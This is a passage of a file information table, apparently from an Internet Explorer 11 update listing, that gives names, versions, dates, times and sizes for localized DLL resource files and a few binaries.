\nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:55| 30,720 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:56| 34,816 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:57| 35,328 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:57| 36,864 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:58| 25,600 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:59| 24,576 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:59| 35,840 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:00| 34,304 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:00| 34,304 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:01| 36,352 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:02| 35,840 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:02| 34,816 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:03| 35,840 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:04| 35,840 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:04| 34,304 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:05| 35,840 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:05| 34,816 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:06| 34,816 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:07| 34,816 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:08| 33,280 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:08| 34,304 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:09| 34,304 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:10| 20,992 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:10| 21,504 \nwebcheck.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:11| 21,504 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:49| 46,592 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:50| 52,736 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:50| 51,200 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:51| 51,200 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:51| 56,320 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:52| 57,856 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:53| 49,664 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:53| 54,272 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:53| 47,616 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:54| 49,152 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:55| 55,296 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:55| 45,056 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:56| 51,712 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:57| 51,712 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:57| 53,248 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:58| 39,424 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:59| 35,840 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:59| 50,176 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:00| 51,200 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:00| 50,688 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:01| 52,736 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:02| 53,760 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:02| 54,272 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:03| 54,272 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:04| 52,736 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:04| 51,200 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:05| 53,248 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:05| 52,736 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:06| 51,712 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:07| 50,688 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:07| 50,688 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:08| 50,176 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:09| 50,176 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:09| 30,720 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:10| 30,720 \nwininet.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:11| 30,720 \ninetcpl.cpl| 11.0.9600.20112| 13-Aug-2021| 19:40| 2,132,992 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:49| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:50| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:50| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:51| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:52| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:52| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:53| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:53| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:53| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:54| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:55| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:55| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:56| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:57| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:57| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:58| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:59| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:59| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:00| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:00| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:01| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:02| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:02| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:03| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:04| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:04| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:05| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:05| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:06| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:07| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:07| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:08| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:09| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:09| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:10| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:11| 10,752 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:49| 307,200 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:50| 293,888 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:50| 290,304 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:51| 289,280 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:51| 299,008 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:53| 303,104 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:53| 282,112 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:53| 296,960 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:54| 283,648 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:54| 291,840 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:55| 299,520 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:55| 275,968 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:56| 290,816 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:57| 293,376 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:57| 296,960 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:58| 258,048 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:59| 256,512 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:59| 289,280 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:00| 288,256 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:00| 285,184 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:01| 295,424 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:02| 297,472 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:02| 292,864 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:03| 295,424 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:04| 294,400 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:04| 294,400 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:05| 292,864 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:05| 290,816 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:06| 288,768 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:07| 286,208 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:07| 281,600 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:08| 286,720 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:09| 292,352 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:09| 242,176 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:10| 243,200 \nmshtml.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:11| 243,200 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:49| 65,536 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:50| 73,728 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:50| 67,584 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:51| 67,584 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:52| 74,240 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:52| 78,848 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:53| 61,440 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:53| 74,752 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:53| 62,464 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:54| 68,096 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:55| 75,264 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:55| 65,536 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:56| 68,608 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:57| 72,192 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:57| 73,216 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:58| 41,472 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:59| 37,888 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:59| 68,608 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:00| 67,584 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:00| 65,536 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:01| 74,240 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:02| 70,656 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:02| 71,168 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:03| 71,680 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:04| 71,168 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:04| 69,632 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:05| 68,096 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:05| 68,608 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:06| 68,096 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:07| 65,536 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:07| 59,904 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:08| 65,536 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:09| 69,120 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:09| 29,696 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:10| 30,720 \nF12Resources.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:11| 30,720 \nJavaScriptCollectionAgent.dll| 11.0.9600.20112| 13-Aug-2021| 19:57| 77,824 \nDiagnosticsHub.ScriptedSandboxPlugin.dll| 11.0.9600.20112| 13-Aug-2021| 19:58| 276,480 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:49| 46,080 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:50| 50,176 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:50| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:51| 49,664 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:51| 51,712 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 19:52| 54,272 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:53| 48,128 \nurlmon.dll.mui| 11.0.9600.201